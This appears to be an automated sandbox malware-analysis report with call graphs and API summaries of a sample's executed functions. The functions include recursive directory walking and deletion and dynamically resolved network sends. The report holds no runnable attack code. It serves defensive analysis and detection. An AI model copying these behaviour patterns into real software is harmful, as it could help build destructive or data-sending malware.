Concurrency::cancel_current_task 15 API calls 21233->21234 21234->21231 21235 c93500 std::_Throw_Cpp_error 14 API calls 21239 c854b6 21235->21239 21236->21233 21237 c853f3 21236->21237 21238 c8541a 21236->21238 21237->21233 21240 c853fe 21237->21240 21241 c8df02 std::_Facet_Register 15 API calls 21238->21241 21238->21253 21242 c854e5 21239->21242 21243 c855b6 21239->21243 21244 c8df02 std::_Facet_Register 15 API calls 21240->21244 21241->21253 21245 c854ff 21242->21245 21247 c85540 21242->21247 21248 c85537 21242->21248 21246 c63750 15 API calls 21243->21246 21244->21253 21250 c8df02 std::_Facet_Register 15 API calls 21245->21250 21249 c855bb 21246->21249 21256 c8df02 std::_Facet_Register 15 API calls 21247->21256 21258 c8551a std::_Locinfo::_Locinfo_ctor 21247->21258 21248->21245 21248->21249 21251 c855c0 21249->21251 21252 c63070 Concurrency::cancel_current_task 15 API calls 21249->21252 21254 c8550f 21250->21254 21255 c93500 std::_Throw_Cpp_error 14 API calls 21251->21255 21252->21251 21253->21235 21257 c85481 std::_Throw_Cpp_error 21253->21257 21254->21251 21254->21258 21261 c855c5 21255->21261 21256->21258 21257->21212 21263 c839d0 14 API calls 21258->21263 21259 c8569f 21260 c63750 15 API calls 21259->21260 21262 c856a4 21260->21262 21261->21259 21264 c880b0 15 API calls 21261->21264 21265 c855a8 21263->21265 21266 c85624 std::_Locinfo::_Locinfo_ctor 21264->21266 21265->21212 21267 c85674 std::_Throw_Cpp_error 21266->21267 21268 c93500 std::_Throw_Cpp_error 14 API calls 21266->21268 21267->21212 21268->21259 21270 c841f2 21269->21270 21271 c841b3 21269->21271 21272 c7e280 15 API calls 21270->21272 21271->21215 21277 c841f7 21272->21277 21273 c84706 21274 c8c5b9 15 API calls 21273->21274 21275 c8470d 21274->21275 21278 c8c5b9 15 API calls 21275->21278 21276 c84269 21276->21215 21277->21273 21277->21275 21277->21276 21281 c8c5b9 21277->21281 21280 c84714 21278->21280 21284 c8c3d7 21281->21284 21283 c8c5ca Concurrency::cancel_current_task 21285 c8c3eb std::regex_error::regex_error 21284->21285 21286 c638e0 std::regex_error::regex_error 15 API calls 21285->21286 21287 c8c3f4 21286->21287 21287->21283 21289 c89f39 21288->21289 21290 c89ef9 21288->21290 21289->21289 21290->21289 21291 c89f10 21290->21291 21292 c8df02 std::_Facet_Register 15 API calls 21290->21292 21293 c8df02 std::_Facet_Register 15 API calls 21291->21293 21295 c89f19 21291->21295 21292->21291 21294 c89f32 21293->21294 21294->21228 21295->21228 21297 c8b24f 21296->21297 21302 c8b188 21296->21302 21297->21226 21302->21297 21320 c84770 21302->21320 21321 c8c5b9 15 API calls 21320->21321 21322 c8477b 21321->21322 20689 c63770 20690 c63787 20689->20690 20693 c9b5c3 20690->20693 20694 c9b5d7 ___std_exception_copy 20693->20694 20695 c9b5f9 20694->20695 20697 c9b620 20694->20697 20696 c93473 ___std_exception_copy 14 API calls 20695->20696 20699 c9b614 20696->20699 20702 c98c26 20697->20702 20700 c9322c ___std_exception_copy 14 API calls 20699->20700 20701 c63791 20700->20701 20703 c98c32 std::_Locinfo::_Locinfo_ctor 20702->20703 20710 c9bae0 RtlEnterCriticalSection 20703->20710 20705 c98c40 20711 c99b5b 20705->20711 20707 c98c4d 20720 c98c75 20707->20720 20710->20705 20712 ca713a 15 API calls 20711->20712 20713 c99b82 20712->20713 20723 c99da3 20713->20723 20716 c99b1d 9 API calls 20717 c99bd6 20716->20717 20718 ca71e5 28 API calls 20717->20718 20719 c99be3 _ValidateLocalCookies 20718->20719 20719->20707 20811 c9baf4 RtlLeaveCriticalSection 20720->20811 20722 c98c5e 20722->20699 20738 c9b365 20723->20738 20726 c99dc9 20727 c93473 ___std_exception_copy 14 API calls 20726->20727 20728 c99bc9 20727->20728 20728->20716 20731 c98a60 std::_Locinfo::_Locinfo_ctor 16 API calls 20733 c99df1 std::_Locinfo::_Locinfo_ctor 20731->20733 20732 c99d2b 14 API calls 20732->20733 20733->20728 20733->20731 20733->20732 20734 c99fe5 20733->20734 20744 c9a8bd 20733->20744 20771 c9a60b 20733->20771 20735 c93473 ___std_exception_copy 14 API calls 20734->20735 20736 c99fff 20735->20736 20737 c93473 ___std_exception_copy 14 API calls 20736->20737 20737->20728 20739 c9b370 20738->20739 20740 c9b392 20738->20740 20741 c93473 ___std_exception_copy 14 API calls 20739->20741 20803 c9b3ce 20740->20803 20743 c99dbe 20741->20743 20743->20726 20743->20728 20743->20733 20745 c9a94d 20744->20745 20746 c9a8e1 20744->20746 20747 c9a98c 20745->20747 20748 c9a952 20745->20748 20749 c9a975 20746->20749 20750 c9a8e7 20746->20750 20751 c9a9ab 20747->20751 20752 c9a991 20747->20752 20753 c9a983 20748->20753 20754 c9a954 20748->20754 20756 c9948c 15 API calls 20749->20756 20759 c9a942 20750->20759 20760 c9a8ec 20750->20760 20755 c9b2dd 15 API calls 20751->20755 20752->20749 20752->20759 20770 c9a914 20752->20770 20757 c9b2c0 15 API calls 20753->20757 20761 c9a963 20754->20761 20766 c9a8fb 20754->20766 20755->20770 20756->20770 20757->20770 20758 c9b015 16 API calls 20758->20770 20763 c99619 15 API calls 20759->20763 20769 c9a9b6 _ValidateLocalCookies 20759->20769 20762 c9a927 20760->20762 20760->20766 20760->20770 20761->20749 20764 c9a967 20761->20764 20765 c9b1a6 17 API calls 20762->20765 20762->20769 20763->20770 20767 c9b23b 14 API calls 20764->20767 20764->20769 20765->20770 20766->20758 20766->20769 20767->20770 20768 ca6e4a 17 API calls 20768->20770 20769->20733 20770->20768 20770->20769 20772 c9a629 20771->20772 20773 c9a612 20771->20773 20776 c93473 ___std_exception_copy 14 API calls 20772->20776 20796 c9a668 20772->20796 20774 c9a94d 20773->20774 20775 c9a8e1 20773->20775 20773->20796 20778 c9a98c 20774->20778 20779 c9a952 20774->20779 20784 c9a8e7 20775->20784 20785 c9a975 20775->20785 20777 c9a65d 20776->20777 20777->20733 20780 c9a9ab 20778->20780 20781 c9a991 20778->20781 20782 c9a983 20779->20782 20783 c9a954 20779->20783 20789 c9b2dd 15 API calls 20780->20789 20781->20785 20791 c9a942 20781->20791 20802 c9a914 20781->20802 20788 c9b2c0 15 API calls 20782->20788 20786 c9a8fb 20783->20786 20793 c9a963 20783->20793 20784->20791 20792 c9a8ec 20784->20792 20787 c9948c 15 API calls 20785->20787 20790 c9b015 16 API calls 20786->20790 20801 c9a9b6 _ValidateLocalCookies 20786->20801 20787->20802 20788->20802 20789->20802 20790->20802 20795 c99619 15 API calls 20791->20795 20791->20801 20792->20786 20794 c9a927 20792->20794 20792->20802 20793->20785 20797 c9a967 20793->20797 20798 c9b1a6 17 API calls 20794->20798 20794->20801 20795->20802 20796->20733 20799 c9b23b 14 API calls 20797->20799 20797->20801 20798->20802 20799->20802 20800 ca6e4a 17 API calls 20800->20802 20801->20733 20802->20800 20802->20801 20804 c9b3e2 20803->20804 20810 c9b44c 20803->20810 20805 ca4a79 14 API calls 20804->20805 20806 c9b3e9 20805->20806 20807 c9bf8f ___std_exception_copy 9 API calls 20806->20807 20806->20810 20808 c9b441 20807->20808 20809 c934f0 ___std_exception_copy 14 API calls 20808->20809 20809->20810 20810->20743 20811->20722 20834 c70d30 20835 c70d3a 20834->20835 20838 c70d7f std::_Throw_Cpp_error 20834->20838 20836 c70d50 20835->20836 20844 c67cc0 20835->20844 20836->20838 20839 c93500 std::_Throw_Cpp_error 14 API calls 20836->20839 20840 c70da7 20839->20840 20841 c70dff std::_Throw_Cpp_error 20840->20841 20842 c93500 std::_Throw_Cpp_error 14 API calls 20840->20842 20843 c70e27 20842->20843 20845 c67ccb std::_Throw_Cpp_error 20844->20845 20846 c67d28 std::_Throw_Cpp_error 20845->20846 20847 c93500 std::_Throw_Cpp_error 14 API calls 20845->20847 20846->20835 20851 c67d4c 20847->20851 20848 c8df02 std::_Facet_Register 15 API calls 20849 c67f4d 20848->20849 20850 c76930 15 API calls 20849->20850 20852 c67fb4 std::_Locinfo::_Locinfo_ctor 20849->20852 20850->20852 20851->20848 20853 c680a0 GetModuleHandleA GetProcAddress WSASend 20852->20853 20854 c68168 20852->20854 20853->20852 20853->20854 20854->20835

                                                                                                                                              Executed Functions

                                                                                                                                              Function 00D52870 Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 351fileCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 0 d52870-d528bc call c8d429 3 d52c44-d52c46 call c8cdc4 0->3 4 d528c2-d528cc 0->4 6 d52c4b-d52c57 call c8cdc4 3->6 5 d528d2-d5290b 4->5 4->6 8 d52911-d52917 5->8 9 d52c5c call c63110 5->9 6->9 11 d52919 8->11 12 d5291b-d52936 call c7b4a0 8->12 15 d52c61-d52c82 call c93500 call c8d429 9->15 11->12 18 d52964-d5299a FindFirstFileA 12->18 19 d52938-d52944 12->19 30 d52c84-d52c8e 15->30 31 d52cab-d52cad call c8cdc4 15->31 21 d529a0-d529a9 18->21 22 d52b98 18->22 23 d52946-d52954 19->23 24 d5295a-d52961 call c8e183 19->24 26 d529b0-d529b5 21->26 27 d52b9a-d52ba0 22->27 23->15 23->24 24->18 26->26 32 d529b7-d529c2 26->32 33 d52ba2-d52bae 27->33 34 d52bce-d52be6 27->34 36 d52c90-d52c9f CreateDirectoryA call c8d43a 30->36 37 d52cb2-d52cc3 call c8cdc4 30->37 31->37 38 d529c4-d529c7 32->38 39 d529cd-d529d0 32->39 41 d52bc4-d52bcb call c8e183 33->41 42 d52bb0-d52bbe 33->42 43 d52c10-d52c43 call c8d43a 34->43 44 d52be8-d52bf4 34->44 55 d52ca4-d52caa 36->55 38->39 47 d52b20-d52b31 FindNextFileA 38->47 48 d529e3-d52a05 39->48 49 d529d2-d529d5 39->49 41->34 42->15 42->41 52 d52c06-d52c0d call c8e183 44->52 53 d52bf6-d52c04 44->53 47->21 57 d52b37-d52b49 GetLastError 47->57 48->9 60 d52a0b-d52a11 48->60 49->48 58 d529d7-d529dd 49->58 52->43 53->15 53->52 57->27 67 d52b4b-d52b51 57->67 58->47 58->48 63 d52a15-d52a34 call c7b4a0 60->63 64 d52a13 60->64 71 d52a37-d52a3c 63->71 64->63 69 d52b55-d52b63 SetFileAttributesA 67->69 70 d52b53 67->70 72 d52b65-d52b6e 69->72 73 d52b70-d52b74 69->73 70->69 71->71 74 d52a3e-d52a96 call c76aa0 call c631c0 71->74 72->27 76 d52b76 73->76 77 d52b78-d52b81 RemoveDirectoryA 73->77 84 d52ac4-d52acb 74->84 85 d52a98-d52aa4 74->85 76->77 77->22 79 d52b83-d52b8c 77->79 79->27 88 d52acd-d52ae0 call d52870 84->88 89 d52aeb-d52b04 84->89 86 d52aa6-d52ab4 85->86 87 d52aba-d52ac1 call c8e183 85->87 86->15 86->87 87->84 88->27 97 d52ae6-d52ae9 88->97 95 d52b8e-d52b96 GetLastError 89->95 96 d52b0a-d52b1e 89->96 95->27 96->47 96->95 97->47
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,00DE8E90,?,?,?,\*.*,00000004), ref: 00D5298C
                                                                                                                                              • FindNextFileA.KERNELBASE(00000000,00000010), ref: 00D52B28
                                                                                                                                              • GetLastError.KERNEL32 ref: 00D52B3E
                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000080), ref: 00D52B5B
                                                                                                                                              • RemoveDirectoryA.KERNEL32(?), ref: 00D52B79
                                                                                                                                              • GetLastError.KERNEL32 ref: 00D52B8E
                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00D52C46
                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00D52C57
                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,00000005), ref: 00D52C92
                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00D52CAD
                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00D52CBE
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Cpp_errorThrow_std::_$File$DirectoryErrorFindLast$AttributesCreateFirstNextRemove
                                                                                                                                              • String ID: \*.*
                                                                                                                                              • API String ID: 2704257422-1173974218
                                                                                                                                              • Opcode ID: 09ecbe75225cc72ff77af787665c177e197404d79a7861038230dee6cff86527
                                                                                                                                              • Instruction ID: d6e12d31e3784d7050b172e9d539c4534b1b000fc9679c3d625b3dc4cf4d8931
                                                                                                                                              • Opcode Fuzzy Hash: 09ecbe75225cc72ff77af787665c177e197404d79a7861038230dee6cff86527
                                                                                                                                              • Instruction Fuzzy Hash: 8BC136319002059BCF24DF64CC89BBDBBB5EF46315F184219EC59A7292DB709A8CDB71
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00CBB010 Relevance: 20.2, APIs: 12, Instructions: 2241COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 00CBB14B
                                                                                                                                              • CreateDirectoryA.KERNEL32(0000000F,00000000), ref: 00CBB6CD
                                                                                                                                              • CreateDirectoryA.KERNEL32(0000000F,00000000), ref: 00CBB8E9
                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 00CBBA77
                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 00CBC326
                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00CBC8B2
                                                                                                                                              • GetLastError.KERNEL32 ref: 00CBC8BD
                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 00CBC90D
                                                                                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,?), ref: 00CBCB49
                                                                                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,00000000,?,?,?,?), ref: 00CBD1EF
                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00CBDB22
                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00CBDB33
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateDirectory$Cpp_errorThrow_std::_$AttributesErrorFileLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 453214671-0
                                                                                                                                              • Opcode ID: 3c0db18d64bbaa0f2f80de1a9249112236600c2570f3449d69e9076afb8635af
                                                                                                                                              • Instruction ID: 2f8c26b6be7b75a8079bb1eac37e16f3b837475eb6616e4a39190706e00aec11
                                                                                                                                              • Opcode Fuzzy Hash: 3c0db18d64bbaa0f2f80de1a9249112236600c2570f3449d69e9076afb8635af
                                                                                                                                              • Instruction Fuzzy Hash: 513323B0D042688BDB25CF68CD84BEDBBB5AF49304F1082D9E459A7252EB306F85DF51
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00CBA790 Relevance: 7.0, APIs: 4, Instructions: 978COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9ae6584482ab6f5c482147a45a32b1b0033f233b328fcd5fa84bccb0f5a254a3
                                                                                                                                              • Instruction ID: 8fe4ea66bf990aa4ad6c1a050effc4d8a27d2c16cbcd0cf56a8f90c97a8163df
                                                                                                                                              • Opcode Fuzzy Hash: 9ae6584482ab6f5c482147a45a32b1b0033f233b328fcd5fa84bccb0f5a254a3
                                                                                                                                              • Instruction Fuzzy Hash: ADA231B0C042688BDB25CF68CD84BEDBBB5AF59304F1482D9E449BB251DB706E89DF50
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00C8C82B Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1808 c8c82b-c8c832 1809 c8c841-c8c842 1808->1809 1810 c8c834-c8c83f 1808->1810 1810->1809 1812 c8c845-c8c872 call c9ea56 call c8c82b FindFirstFileExW 1810->1812 1817 c8c878 GetLastError 1812->1817 1818 c8c874-c8c876 1812->1818 1819 c8c87e-c8c87f 1817->1819 1818->1819
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileExW.KERNEL32(000000FF,00000001,?,00000000,00000000,00000000,?,?,?,00C809DA,?), ref: 00C8C866
                                                                                                                                              • GetLastError.KERNEL32(?,00C809DA,?), ref: 00C8C878
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorFileFindFirstLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 873889042-0
                                                                                                                                              • Opcode ID: 7a133db744cb40d82c00746803c78282b2cd6c6706b4623599a3c190a3527eeb
                                                                                                                                              • Instruction ID: 28bbb422e26b26a181ac4fb2d4c1bc9cd7e0ed87ed3ba3382796f89a319fc22e
                                                                                                                                              • Opcode Fuzzy Hash: 7a133db744cb40d82c00746803c78282b2cd6c6706b4623599a3c190a3527eeb
                                                                                                                                              • Instruction Fuzzy Hash: 51F03A3104020AAFDB106FA49C489BA7BA8EB05374B104625F969D15F1DA318AA2A7B4
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00D32890 Relevance: 2.1, APIs: 1, Instructions: 560COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
